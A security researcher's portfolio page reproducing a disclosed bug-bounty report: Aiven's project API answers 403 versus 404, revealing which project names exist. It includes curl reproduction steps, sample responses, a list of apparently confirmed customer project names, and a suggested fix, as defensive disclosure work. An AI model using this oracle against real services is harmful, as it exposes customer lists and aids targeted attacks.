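<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Project Name Enumeration | Zion Boggan</title>
<!-- The path placeholder is encoded once (&lt;name&gt;). The previous value was
     double-encoded (&amp;lt;), so search snippets showed the entity text instead of <name>. -->
<meta name="description" content="403 vs 404 oracle on `/v1/project/&lt;name&gt;` enumerates the entire managed-services customer base.">
<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">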
<style>
  /* design tokens shared by the portfolio and the notebook pages */
  :root{
    --bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;
    --line:#222936; --line2:#2c3543;
    --ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;
    --accent:#6cc7b8; --accent-dim:#274b47;
    --maxw:1020px;
  }
  /* base */
  *{box-sizing:border-box;}
  html{scroll-behavior:smooth;}
  body{margin:0;background:var(--bg);color:var(--ink);
    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
    font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}
  .mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}
  a{color:var(--accent);text-decoration:none;}
  a:hover{color:#8fe0d2;}
  .wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}
 
  /* nav */
  /* NOTE(review): backdrop-filter is unprefixed; older Safari also wants -webkit-backdrop-filter — confirm target browsers */
  nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);
    backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}
  nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}
  nav .brand{font-weight:600;letter-spacing:.2px;}
  nav .brand .dot{color:var(--accent);}
  nav .links{display:flex;gap:26px;font-size:13.5px;}
  nav .links a{color:var(--muted);}
  nav .links a:hover{color:var(--ink);}
  @media(max-width:680px){nav .links{display:none;}}
 
  /* hero */
  header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);
    background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}
  .avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);
    display:flex;align-items:center;gap:9px;margin-bottom:20px;}
  .avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);
    box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}
  @keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}
  h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}
  .hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}
  .hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}
  .hero .lede b{color:var(--ink);font-weight:600;}
  .cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}
  .btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;
    font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}
  .btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}
  .btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}
  .btn.primary:hover{background:#8fe0d2;color:#06231f;}
  .meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}
  .meta .mono{color:var(--faint);}
 
  /* sections */
  section{padding:64px 0;border-bottom:1px solid var(--line);}
  .shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}
  .shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}
  .shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}
  .shead .rule{flex:1;height:1px;background:var(--line);}
 
  /* flagship */
  .flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);
    border:1px solid var(--line2);border-radius:14px;overflow:hidden;}
  .flag .top{padding:30px 32px 8px;}
  .flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}
  .flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}
  .flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}
  .flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}
  .flag p{color:var(--soft);margin:0 0 16px;}
  .flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}
  .stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}
  .stat .n{font-size:21px;font-weight:680;color:var(--ink);}
  .stat .k{font-size:12px;color:var(--muted);margin-top:2px;}
  .spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}
  .spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}
  .spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}
  .spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}
  .spec li:first-child{border-top:none;}
  .spec li span{color:var(--muted);}
  .flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}
  @media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}
 
  /* lab cards */
  .cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}
  @media(max-width:680px){.cards{grid-template-columns:1fr;}}
  .card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);
    display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}
  .card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}
  .card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}
  .card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}
  .card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}
  .card h3{margin:0 0 9px;font-size:17px;}
  .card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}
  .tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}
  .tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);
    border-radius:5px;padding:3px 8px;}
  .card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}
  .card .lnk::after{content:" →";}
 
  /* research */
  .rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}
  .research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;
    padding:18px 22px;border-top:1px solid var(--line);}
  .ritem:first-child{border-top:none;}
  .ritem:hover{background:var(--panel);}
  .ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}
  .ritem h3{margin:0 0 3px;font-size:16px;}
  .ritem p{margin:0;font-size:13.5px;color:var(--muted);}
  .ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}
  @media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}
  .progs{margin-top:22px;}
  .progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}
  .progs .row{display:flex;flex-wrap:wrap;gap:7px;}
  .progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);
    border-radius:6px;padding:4px 10px;}
 
  /* credentials */
  .cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}
  @media(max-width:680px){.cred{grid-template-columns:1fr;}}
  .cred p{color:var(--soft);margin:0 0 14px;}
  .cred .role{font-size:14px;color:var(--muted);}
  .cred .role b{color:var(--ink);font-weight:600;}
  .certs{list-style:none;margin:0;padding:0;}
  .certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);
    display:flex;gap:10px;align-items:baseline;}
  .certs li:first-child{border-top:none;}
  .certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}
 
  /* footer */
  footer{padding:46px 0 64px;}
  footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}
  footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}
  footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}
 
  /* notebook detail page: compact hero, then the rendered write-up body in .content */
  .detail-hero{padding:40px 0 26px;}
  .back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}
  .back:hover{color:var(--ink);}
  .kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}
  .detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}
  .detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}
  .facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}
  /* .content h1 is styled because the rendered write-up may start with its own h1 (see body markup) */
  .content{padding:8px 0 0;max-width:840px;}
  .content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}
  .content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}
  .content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}
  .content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}
  .content p{color:var(--soft);margin:0 0 15px;}
  .content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}
  .content li{margin:5px 0;}
  .content strong{color:var(--ink);font-weight:600;}
  .content a{color:var(--accent);}
  .content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}
  .content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}
  .content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}
  .content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}
  .content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}
  .content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}
  .content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}
  .content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}
  /* notebook index */
  .nbgroup{margin:40px 0 0;}
  .nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}
  .nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}
  .nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .nbtable tr{border-top:1px solid var(--line);}
  .nbtable tr:first-child{border-top:none;}
  .nbtable tr:hover{background:var(--panel);}
  .nbtable td{padding:14px 16px;vertical-align:top;}
  .nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}
  .nbtable .ti a{font-weight:600;color:var(--ink);}
  .nbtable .ti a:hover{color:var(--accent);}
  .nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}
  @media(max-width:680px){.nbtable .cls{width:auto;display:block;}}
</style>
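<link rel="canonical" href="https://zionboggan.com/security-research-notebook/project-name-enumeration/">
<meta name="author" content="Zion Boggan">
<meta name="robots" content="index, follow, max-image-preview:large">
<meta property="og:type" content="article">
<meta property="og:site_name" content="Zion Boggan">
<meta property="og:title" content="Project Name Enumeration | Zion Boggan">
<!-- Social descriptions: the path placeholder is encoded once (&lt;name&gt;). The previous
     value was double-encoded (&amp;lt;), so link previews showed the entity text literally. -->
<meta property="og:description" content="403 vs 404 oracle on `/v1/project/&lt;name&gt;` enumerates the entire managed-services customer base.">
<meta property="og:url" content="https://zionboggan.com/security-research-notebook/project-name-enumeration/">
<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Project Name Enumeration | Zion Boggan">
<meta name="twitter:description" content="403 vs 404 oracle on `/v1/project/&lt;name&gt;` enumerates the entire managed-services customer base.">
<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">
<!-- JSON-LD is raw script text: HTML entities are not decoded inside it, so the angle
     brackets are written as JSON \u escapes (which also keeps a literal "<" out of the script). -->
<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"Project Name Enumeration","description":"403 vs 404 oracle on `/v1/project/\u003cname\u003e` enumerates the entire managed-services customer base.","url":"https://zionboggan.com/security-research-notebook/project-name-enumeration/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>
</head>
<body>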
<nav>
  <div class="wrap">
    <!-- brand mark; the inline colour overrides the global accent link colour -->
    <a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>
    <!-- site links; .links is a flex row, so the line breaks between anchors do not render -->
    <span class="links">
      <a href="/#oversight">Oversight</a>
      <a href="/#labs">Labs</a>
      <a href="/#research">Research</a>
      <a href="/security-research-notebook/">Notebook</a>
      <a href="/">Home</a>
    </span>
  </div>
</nav>
<header class="hero detail-hero">
  <div class="wrap">
    <!-- back link to the notebook index, finding class, page title -->
    <a class="back" href="/security-research-notebook/">&larr; Research notebook</a>
    <div class="kicker">Info disclosure</div>
    <h1>Project Name Enumeration</h1>
  </div>
</header>
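<!-- The write-up is the page's primary content, so it is wrapped in the (previously missing) main landmark. -->
<main>
<section><div class="wrap"><div class="content">
<!-- NOTE(review): the body below is rendered markdown, so it carries a second h1 after the hero title
     and a heading ("DESCRIPTION:") with no content of its own; the .content h1/h2 styles depend on
     these levels, so they are left as authored rather than re-levelled here. -->
<h1>SUBMISSION 1</h1>
<p>TITLE: Project Name Enumeration via 403/404 Response Differentiation Leaks Customer List</p>
<p>TARGET: api.aiven.io (https://api.aiven.io/login)</p>
<p>VRT CATEGORY: Server Security Misconfiguration &gt; Information Disclosure</p>
<p>URL: https://api.aiven.io/v1/project/{project_name}</p>
<h2>DESCRIPTION:</h2>
<h2>Summary</h2>
<p>The <code>GET /v1/project/{project_name}</code> endpoint returns differentiated HTTP responses for existing vs non-existing projects, allowing any authenticated user to enumerate all project names on the Aiven platform. Since project names frequently match company or organization names, this directly reveals Aiven&rsquo;s customer list.</p>
<ul>
<li>Existing project (not owned by requester): <strong>403</strong>, <code>"Not a project member"</code></li>
<li>Non-existing project: <strong>404</strong>, <code>"Project does not exist"</code></li>
</ul>
<h2>Steps to Reproduce</h2>
<ol>
<li>
<p>Authenticate to the Aiven API with any valid token.</p>
</li>
<li>
<p>Query existing project name:</p>
</li>
</ol>
<pre><code class="language-bash">curl -s https://api.aiven.io/v1/project/netflix \
  -H &quot;Authorization: aivenv1 &lt;TOKEN&gt;&quot;
</code></pre>
<p><strong>Response (403):</strong></p>
<pre><code class="language-json">{&quot;errors&quot;:[{&quot;message&quot;:&quot;Not a project member&quot;,&quot;status&quot;:403}]}
</code></pre>
<ol start="3">
<li>Query non-existing project name:</li>
</ol>
<pre><code class="language-bash">curl -s https://api.aiven.io/v1/project/doesnotexist12345xyz \
  -H &quot;Authorization: aivenv1 &lt;TOKEN&gt;&quot;
</code></pre>
<p><strong>Response (404):</strong></p>
<pre><code class="language-json">{&quot;errors&quot;:[{&quot;message&quot;:&quot;Project does not exist&quot;,&quot;status&quot;:404}]}
</code></pre>
<ol start="4">
<li>The 403/404 differentiation confirms whether a project name exists on the platform.</li>
</ol>
<h2>Confirmed Existing Projects</h2>
<!-- column headers carry scope so screen readers associate each cell with its header -->
<table>
<thead>
<tr>
<th scope="col">Project Name</th>
<th scope="col">HTTP Status</th>
</tr>
</thead>
<tbody>
<tr><td><code>netflix</code></td><td>403 (exists)</td></tr>
<tr><td><code>spotify</code></td><td>403 (exists)</td></tr>
<tr><td><code>google</code></td><td>403 (exists)</td></tr>
<tr><td><code>facebook</code></td><td>403 (exists)</td></tr>
<tr><td><code>tesla</code></td><td>403 (exists)</td></tr>
<tr><td><code>databricks</code></td><td>403 (exists)</td></tr>
<tr><td><code>redis</code></td><td>403 (exists)</td></tr>
<tr><td><code>grafana</code></td><td>403 (exists)</td></tr>
<tr><td><code>production</code></td><td>403 (exists)</td></tr>
<tr><td><code>internal</code></td><td>403 (exists)</td></tr>
</tbody>
</table>
<p>Controls: <code>doesnotexist12345xyz</code>, <code>another-fake-project-abc</code> → 404.</p>
<h2>Impact</h2>
<p>An attacker can enumerate Aiven&rsquo;s customer base by iterating company names against this endpoint. This reveals which organizations use Aiven for their database infrastructure, commercially sensitive information that enables competitive intelligence gathering and targeted supply chain attacks against confirmed Aiven customers.</p>
<h2>Suggested Fix</h2>
<p>Return a uniform <code>404 "Project does not exist"</code> for both non-existing projects and projects the requester doesn&rsquo;t have access to. Matching the status code alone is not sufficient: the error body and headers should be identical in both cases as well, otherwise the same oracle survives as a body-length or message difference.</p>
<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source &middot; github.com/zionboggan/security-research-notebook &middot; writeups/aiven/project-name-enumeration.md</p>
</div></div></section>
</main>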
<footer>
  <div class="wrap row">
    <!-- links stay on one line: .links is not a flex container, so whitespace between anchors would render -->
    <div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>
    <!-- disclosure policy statement shown on every notebook page -->
    <div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>
  </div>
</footer>
</body>
</html>